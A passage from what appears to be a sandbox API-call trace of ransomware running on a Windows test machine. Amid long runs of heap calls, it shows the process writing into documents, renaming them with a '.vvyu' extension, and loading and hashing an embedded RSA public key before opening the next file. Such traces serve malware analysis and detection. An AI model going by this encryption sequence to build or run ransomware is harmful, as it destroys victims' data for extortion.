hHeap=0x620000) returned 1 [0193.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a50 | out: hHeap=0x620000) returned 1 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643af0 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b08 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x643b38 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b08 | out: hHeap=0x620000) returned 1 [0193.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.771] GetCurrentThreadId () returned 0x66c [0193.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f5c0 [0193.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.772] GetCurrentThreadId () returned 0x66c [0193.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643af0 [0193.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b38 [0193.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b08 [0193.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6572d0 [0193.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657228 [0193.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0193.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657300 [0193.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b38 [0193.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea6a50 [0193.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6c60 [0193.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0193.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6e78 [0193.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c60 | out: hHeap=0x620000) returned 1 [0193.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e78 | out: hHeap=0x620000) returned 1 [0193.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b08 | out: hHeap=0x620000) returned 1 [0193.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b20 | out: hHeap=0x620000) returned 1 [0193.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0b10 | out: hHeap=0x620000) returned 1 [0193.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a50 | out: hHeap=0x620000) returned 1 [0193.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.784] WriteFile (in: hFile=0x568, lpBuffer=0x2ea1a68*, nNumberOfBytesToWrite=0x4fd4, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea1a68*, lpNumberOfBytesWritten=0x312fb14*=0x4fd4, lpOverlapped=0x0) returned 1 [0193.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.785] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x4fd9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.785] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea1a68 [0193.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea1a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea1e98 [0193.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.786] WriteFile (in: hFile=0x568, lpBuffer=0x2ea1e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea1e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e98 | out: hHeap=0x620000) returned 1 [0193.787] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.787] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.787] CloseHandle (hObject=0x568) returned 1 [0193.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0193.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea1a68 [0193.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0193.788] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\HeOaqMZgOojF528t.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\heoaqmzgoojf528t.odt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\HeOaqMZgOojF528t.odt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\heoaqmzgoojf528t.odt.vvyu")) returned 1 [0193.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.790] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0193.793] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25c9eb00, ftCreationTime.dwHighDateTime=0x1d89ace, ftLastAccessTime.dwLowDateTime=0xf19708e0, ftLastAccessTime.dwHighDateTime=0x1d89e4c, ftLastWriteTime.dwLowDateTime=0xf19708e0, ftLastWriteTime.dwHighDateTime=0x1d89e4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hhuy", cAlternateFileName="")) returned 1 [0193.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0193.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0193.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0193.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0193.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.794] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf9b870, ftCreationTime.dwHighDateTime=0x1d89d24, ftLastAccessTime.dwLowDateTime=0x8710a7e0, ftLastAccessTime.dwHighDateTime=0x1d8a1c3, ftLastWriteTime.dwLowDateTime=0x8710a7e0, ftLastWriteTime.dwHighDateTime=0x1d8a1c3, nFileSizeHigh=0x0, nFileSizeLow=0xd538, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J0ThFcHeulkvK.odp", cAlternateFileName="J0THFC~1.ODP")) returned 1 [0193.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0b10 [0193.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0b10 | out: hHeap=0x620000) returned 1 [0193.794] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\J0ThFcHeulkvK.odp") returned=".odp" [0193.794] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\J0ThFcHeulkvK.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\j0thfcheulkvk.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.795] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=54584) returned 1 [0193.795] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.798] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd512, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.798] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.801] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.801] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xd538, lpOverlapped=0x0) returned 1 [0193.802] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.802] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.802] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.802] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.804] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.804] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.804] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.804] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.804] GetLastError () returned 0x0 [0193.804] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.804] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.804] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.804] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.805] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.805] HeapFree (in: 